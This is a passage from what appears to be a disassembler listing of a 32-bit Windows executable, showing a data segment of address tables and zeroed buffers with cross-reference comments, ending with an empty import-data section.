; sub_4CE2E0+5D0�r ...
dword_4E1760 dd 77E79881h ; DATA XREF: sub_4CE2E0+3E6�w
dword_4E1764 dd 77E79A45h ; DATA XREF: sub_4CE2E0+3FA�w
; sub_4D8864+9�r
dword_4E1768 dd 77E64E2Bh ; DATA XREF: sub_4CE2E0+40E�w
; sub_4DA741+23�r
dword_4E176C dd 77E74D76h ; DATA XREF: sub_4CE2E0+422�w
; _4:004CEC5D�r ...
dword_4E1770 dd 77E77CCEh ; DATA XREF: sub_4CE2E0+436�w
; sub_4D9A34+69�r ...
dword_4E1774 dd 77E706B7h ; DATA XREF: sub_4CE2E0+44A�w
dword_4E1778 dd 77E6D706h ; DATA XREF: _4:004CDE93�r _4:004CDEBC�r ...
dword_4E177C dd 77E78B82h ; DATA XREF: sub_4CE2E0+472�w
; _4:004D0B0B�r ...
dword_4E1780 dd 77E6BD68h ; DATA XREF: sub_4CE2E0+486�w
dword_4E1784 dd 77E74A3Bh ; DATA XREF: sub_4CE2E0+49A�w
; sub_4DB3FC+57�r
dword_4E1788 dd 77E78C81h ; DATA XREF: sub_4CE2E0+4AE�w
; sub_4D0346+74�r ...
dword_4E178C dd 77F51587h ; DATA XREF: sub_4CE2E0+4C2�w
; sub_4CF252+3BC�r ...
dword_4E1790 dd 77E7C9E7h ; DATA XREF: sub_4CE2E0+4D6�w
; sub_4D8C17+8�r ...
dword_4E1794 dd 77E61BE6h ; DATA XREF: sub_4CC271+137�r
; sub_4CC271+16A�r ...
dword_4E1798 dd 77E616B4h ; DATA XREF: sub_4CE2E0+4FE�w
; sub_4D8401+2D�r ...
dword_4E179C dd 77E64EA0h ; DATA XREF: sub_4CE2E0+512�w
; sub_4DA77D+23�r
dword_4E17A0 dd 77E75090h ; DATA XREF: sub_4CE2E0+526�w
; sub_4CEDE4:loc_4CEDEE�r ...
dword_4E17A4 dd 77E7980Ah ; DATA XREF: sub_4CE2E0+53A�w
; sub_4CFFBF+125�r ...
dword_4E17A8 dd 77E79E34h ; DATA XREF: sub_4CE2E0+54E�w
; sub_4CFECD+91�r ...
dword_4E17AC dd 77E6169Ah ; DATA XREF: sub_4CE2E0+562�w
; sub_4CFFBF+14B�r ...
dword_4E17B0 dd 77E7F044h ; DATA XREF: sub_4CE2E0+576�w
; sub_4D8EF3+56�r
dword_4E17B4 dd 77E79D5Bh ; DATA XREF: sub_4CE2E0+58A�w
dword_4E17B8 dd 77E79924h ; DATA XREF: sub_4CE2E0+59E�w
; sub_4DA226+6A�r ...
dword_4E17BC dd 77E79D8Ch ; DATA XREF: sub_4CE2E0+5B2�w
; sub_4CF94C+282�r ...
dword_4E17C0 dd 77E76A2Eh ; DATA XREF: sub_4CE2E0+5C6�w
; sub_4D1CC4+1E2�r ...
dword_4E17C4 dd 77D98E9Ah ; DATA XREF: sub_4CE2E0+5FF�w
; sub_4D8401+B�r ...
dword_4E17C8 dd 77D44D9Bh ; DATA XREF: sub_4CE2E0+613�w
; sub_4CF252+88�r ...
dword_4E17CC dd 77D4D42Bh ; DATA XREF: sub_4CE2E0+627�w
; sub_4DB1EA+44�r
dword_4E17D0 dd 77D6ADD7h ; DATA XREF: sub_4CE2E0+63B�w
; sub_4D8401+1E�r ...
dword_4E17D4 dd 77D4C96Ah ; DATA XREF: sub_4CE2E0+64F�w
; sub_4D7494+5D�r ...
dword_4E17D8 dd 77D4C783h ; DATA XREF: sub_4CE2E0+663�w
; sub_4D848C+45�r ...
dword_4E17DC dd 77C87425h ; DATA XREF: sub_4CE2E0+69C�w
; sub_4CF94C+2D4�r
dword_4E17E0 dd 77C7212Fh ; DATA XREF: sub_4CC15E+41�r
; sub_4CE2E0+6B0�w ...
dword_4E17E4 dd 77C76551h ; DATA XREF: sub_4CE2E0+6C4�w
; sub_4D5456+1D1�r
dword_4E17E8 dd 77C72C6Bh ; DATA XREF: sub_4CC15E+8A�r
; sub_4CE2E0+6D8�w ...
dword_4E17EC dd 77C87887h ; DATA XREF: sub_4CE2E0+6EC�w
; sub_4CFD24+E6�r ...
dword_4E17F0 dd 77D458EEh ; DATA XREF: sub_4CC15E+38�r
; sub_4CE2E0+700�w
dword_4E17F4 dd 77D458FDh ; DATA XREF: sub_4CC15E+97�r
; sub_4CE2E0+714�w
dword_4E17F8 dd 77C7506Dh ; DATA XREF: sub_4CC15E+2B�r
; sub_4CC271+26�r ...
dword_4E17FC dd 77C71BB0h ; DATA XREF: sub_4CC15E+53�r
; sub_4CC15E+81�r ...
dword_4E1800 dd 77C72889h ; DATA XREF: sub_4CC271+175�r
; sub_4CE2E0+750�w
dword_4E1804 dd 77C729E2h ; DATA XREF: sub_4CC15E+75�r
; sub_4CE2E0+764�w
dword_4E1808 dd 77D45CBCh ; DATA XREF: sub_4CC216+F�r
; sub_4CE2E0+778�w
dword_4E180C dd 77D48977h ; DATA XREF: sub_4CC216+41�r
; sub_4CE2E0+78C�w
dword_4E1810 dd 77D47F34h ; DATA XREF: sub_4CC216+4A�r
; sub_4CE2E0+7A0�w
dword_4E1814 dd 77D4DCCCh ; DATA XREF: sub_4CC271+5C�r
; sub_4CE2E0+7B4�w
dword_4E1818 dd 77D477C0h ; DATA XREF: sub_4CC271+64�r
; sub_4CC271+6F�r ...
dword_4E181C dd 77D414D4h ; DATA XREF: sub_4CC271+E9�r
; sub_4CE2E0+7DC�w
dword_4E1820 dd 77D44200h ; DATA XREF: sub_4CC271+105�r
; sub_4CE2E0+7F0�w
dword_4E1824 dd 77D43DD3h ; DATA XREF: sub_4CC271+123�r
; sub_4CE2E0+804�w
dword_4E1828 dd 77D441F2h ; DATA XREF: sub_4CC271+12D�r
; sub_4CE2E0+818�w
dword_4E182C dd 77D49A11h ; DATA XREF: sub_4CC216+31�r
; sub_4CE2E0+82C�w
dword_4E1830 dd 77D47627h ; DATA XREF: sub_4CC271+157�r
; sub_4CE2E0+840�w
dword_4E1834 dd 77D46F5Bh ; DATA XREF: sub_4CE2E0+854�w
dword_4E1838 dd 77D442CFh ; DATA XREF: _4:004CE2C7�r
; sub_4CE2E0+868�w
dword_4E183C dd 77E7AC37h ; DATA XREF: sub_4CC3F3+45�r
; sub_4CE2E0+87C�w
dword_4E1840 dd 0 ; DATA XREF: sub_4CE2E0+888�o
byte_4E1844 db 0 ; DATA XREF: sub_4CF166+69�o
; sub_4CF166+7F�w ...
align 4
dd 20h dup(0)
dword_4E18C8 dd 77FC5940h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_4CF252+25�o
; sub_4CF61F�o ...
dword_4E18E0 dd 990538h ; DATA XREF: sub_4CFECD+25�r
; sub_4CFECD+5D�r ...
dword_4E18E4 dd 9900A8h ; DATA XREF: sub_4CF036+50�r
; sub_4CF036+8E�r ...
dword_4E18E8 dd 9902F0h ; DATA XREF: sub_4CF94C:loc_4CFA1E�r
; sub_4CF94C+10B�r ...
dword_4E18EC dd 990780h ; DATA XREF: sub_4CF63E+7E�r
; sub_4CF6DE+25�r ...
dword_4E18F0 dd 0 ; DATA XREF: sub_4D2D50+8�r
; sub_4D2D50+19�r
dword_4E18F4 dd 0 ; DATA XREF: sub_4D2D50+10�r
dword_4E18F8 dd 950048h ; DATA XREF: _4:004D0A28�r _4:004D0AFF�r ...
dword_4E18FC dd 960090h ; DATA XREF: sub_4D2DD0+660�w
; _6:off_4E0B80�o
dword_4E1900 dd 970098h ; DATA XREF: sub_4D2DD0+67E�w
; _6:004E0B98�o
dword_4E1904 dd 9800A0h ; DATA XREF: sub_4D2DD0+69D�w
; _6:004E0BB0�o
dword_4E1908 dd 912518h ; DATA XREF: sub_4CF252+34�r
; sub_4CF252+5E�r ...
dword_4E190C dd 913140h ; DATA XREF: sub_4D2DD0+227�w
; sub_4D2DD0+235�r ...
dword_4E1910 dd 4000F0h ; DATA XREF: sub_4D3610+D8�w
; sub_4D3610+DE�r ...
dword_4E1914 dd 0 ; DATA XREF: sub_4D4D70+4�r
; sub_4D4D70+C�w ...
dword_4E1918 dd 2 dup(0) ; DATA XREF: sub_4CC271+DD�o
; sub_4DAD0C+37�o
dword_4E1920 dd 0 ; DATA XREF: sub_4D7333+11�r
; sub_4D7494+22�w ...
align 8
dword_4E1928 dd 0 ; DATA XREF: sub_4D5BD7+3AB�w
; sub_4D5BD7+3DB�w ...
align 10h
dword_4E1930 dd 77FC5880h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_4CD2E0+3B3�o
; sub_4D61E1+73�o ...
dword_4E1948 dd 0 ; DATA XREF: sub_4D7333+24�w
; sub_4D7333+29�r ...
dword_4E194C dd 9123B8h ; DATA XREF: sub_4D5BD7+22A�r
; sub_4D5FCD+12�r ...
dword_4E1950 dd 912478h ; DATA XREF: sub_4D9DD4+F6�w
dword_4E1954 dd 912418h ; DATA XREF: sub_4D58CF+1A�r
; sub_4D5BD7:loc_4D5D97�r ...
dword_4E1958 dd 0 ; DATA XREF: sub_4D61E1+D0D�w
; sub_4D71C3+5F�r
dword_4E195C dd 0 ; DATA XREF: sub_4D58A0+3�r
; sub_4D58A0+1D�w ...
dword_4E1960 dd 0 ; DATA XREF: sub_4D5BD7+3B5�r
; sub_4D5BD7+3C6�w ...
dword_4E1964 dd 0 ; DATA XREF: sub_4D61E1+82�r
; sub_4D61E1+E3�r ...
dword_4E1968 dd 0 ; DATA XREF: sub_4D61E1+105�r
; sub_4D61E1+10B�w ...
dword_4E196C dd 0 ; DATA XREF: sub_4D613C+5�r
; sub_4D614D+A�r ...
dword_4E1970 dd 0 ; DATA XREF: sub_4D7333+9B�r
; sub_4D7494+9E�w ...
dword_4E1974 dd 0 ; DATA XREF: sub_4D7333+A8�r
; sub_4D7494+CC�w ...
dword_4E1978 dd 0 ; DATA XREF: sub_4D7333+BA�r
; sub_4D7494+FA�w ...
dword_4E197C dd 0 ; DATA XREF: sub_4D7333+D4�r
; sub_4D7494+128�w ...
dword_4E1980 dd 0 ; DATA XREF: sub_4D7333+F0�r
; sub_4D7333+10C�r ...
dword_4E1984 dd 0 ; DATA XREF: sub_4D7333+11E�r
; sub_4D7333+135�r ...
dword_4E1988 dd 0 ; DATA XREF: sub_4D7333+3F�r
; sub_4D7494+1B2�w ...
dword_4E198C dd 0 ; DATA XREF: sub_4D7333+5D�r
; sub_4D7494+1E0�w ...
dword_4E1990 dd 0 ; DATA XREF: sub_4D7333+13D�r
; sub_4D7494+20E�w ...
dword_4E1994 dd 0 ; DATA XREF: sub_4D7333+1E�r
; sub_4D7494+23C�w ...
dword_4E1998 dd 0 ; DATA XREF: sub_4D7333+C2�r
; sub_4D7333+FF�r ...
dword_4E199C dd 0 ; DATA XREF: sub_4D7333+6B�r
; sub_4D7494+298�w ...
dword_4E19A0 dd 20h dup(0) ; DATA XREF: sub_4D7333+CF�o
; sub_4D7494+45�o ...
dword_4E1A20 dd 0 ; DATA XREF: sub_4D8892+27�w
; sub_4D8892+32�r
align 8
dword_4E1A28 dd 77FC5860h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_4CD2E0+3A8�o
; sub_4D848C+6�o ...
byte_4E1A40 db 0 ; DATA XREF: sub_4D8892+7�r
; sub_4D8892+15�r ...
align 4
dword_4E1A44 dd 910000h ; DATA XREF: sub_4D8397+4�r
; sub_4D8397+22�w ...
dword_4E1A48 dd 56Bh dup(0) ; DATA XREF: sub_4D848C+11�o
; sub_4D84F7+5�o
dword_4E2FF4 dd 456h dup(0) ; CODE XREF: _5:004DE2F8�j
dword_4E414C dd 63Fh dup(0) ; DATA XREF: _2:off_42955C�o
dword_4E5A48 dd 0 ; DATA XREF: sub_4D8892+7C�r
; sub_4D8892+82�w ...
align 10h
dword_4E5A50 dd 0 ; DATA XREF: sub_4CC15E+25�r
; sub_4CC15E+4A�r ...
dword_4E5A54 dd 0 ; DATA XREF: sub_4CC216+23�r
; sub_4CC216+2B�r ...
dword_4E5A58 dd 2 dup(0) ; DATA XREF: sub_4CC3F3+32�o
dword_4E5A60 dd 0 ; DATA XREF: sub_4CC271+2C�w
; sub_4CC271+57�o
align 8
dword_4E5A68 dd 0 ; DATA XREF: sub_4CC271+36�w
dd 2 dup(0)
dword_4E5A74 dd 0 ; DATA XREF: sub_4CC271+52�w
dd 4 dup(0)
dword_4E5A88 dd 0 ; DATA XREF: sub_4CC271+40�w
align 10h
dword_4E5A90 dd 0ECh dup(0) ; DATA XREF: sub_4D8EF3+28�o
; sub_4D8EF3+42�o ...
byte_4E5E40 db 0 ; DATA XREF: sub_4D90EF+71�w
; sub_4D90EF+8F�r
byte_4E5E41 db 0 ; DATA XREF: sub_4D90EF+7B�w
byte_4E5E42 db 0 ; DATA XREF: sub_4D90EF+85�w
align 4
dd 13h dup(0)
dword_4E5E90 dd 42h dup(0) ; DATA XREF: sub_4D90EF+B�o
; sub_4D90EF+17�o ...
dword_4E5F98 dd 40h dup(0) ; DATA XREF: sub_4D9638+AB�o
; sub_4D971C+5D�o
dword_4E6098 dd 77FC5A00h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_4D9638+25�o
; sub_4D9696�o ...
dword_4E60B0 dd 0 ; DATA XREF: sub_4D9638+34�r
; sub_4D9638+4E�w ...
align 8
dword_4E60B8 dd 77FC59E0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_4D9DD4+6�o
; sub_4DA0C8+25�o
byte_4E60D0 db 0 ; DATA XREF: sub_4D9C54:loc_4D9C64�r
; sub_4DA0C8+30�w
align 4
dword_4E60D4 dd 912110h ; DATA XREF: sub_4D53D0+D�r
; sub_4D53D0+26�r ...
dword_4E60D8 dd 912358h ; DATA XREF: sub_4D50D0+264�r
; sub_4D9DD4+72�w ...
dword_4E60DC dd 0 ; DATA XREF: sub_4CD2E0+3FD�w
dword_4E60E0 dd 0 ; DATA XREF: sub_4DB677+2F�w
; sub_4DB677+47�r
byte_4E60E4 db 0 ; DATA XREF: sub_4DB677+4�r
; sub_4DB677+12�r ...
align 4
dword_4E60E8 dd 0 ; DATA XREF: sub_4CCA80+28�r
; sub_4CCA80+4C�w ...
dd 2 dup(0)
dword_4E60F4 dd 0 ; DATA XREF: sub_4CC86E+4�r
; sub_4CC86E+9D�r ...
dd 3 dup(0)
dword_4E6104 dd 0 ; DATA XREF: sub_4CCA80+C0�r
; sub_4CCDBF+A6�r
dd 0
dword_4E610C dd 0 ; DATA XREF: sub_4CCDBF+26�r
; sub_4CCDBF:loc_4CCE29�w
_6 ends
; Section 8. (virtual address 000E7000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 000E6200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4E7000h
align 2000h
_idata2 ends
end start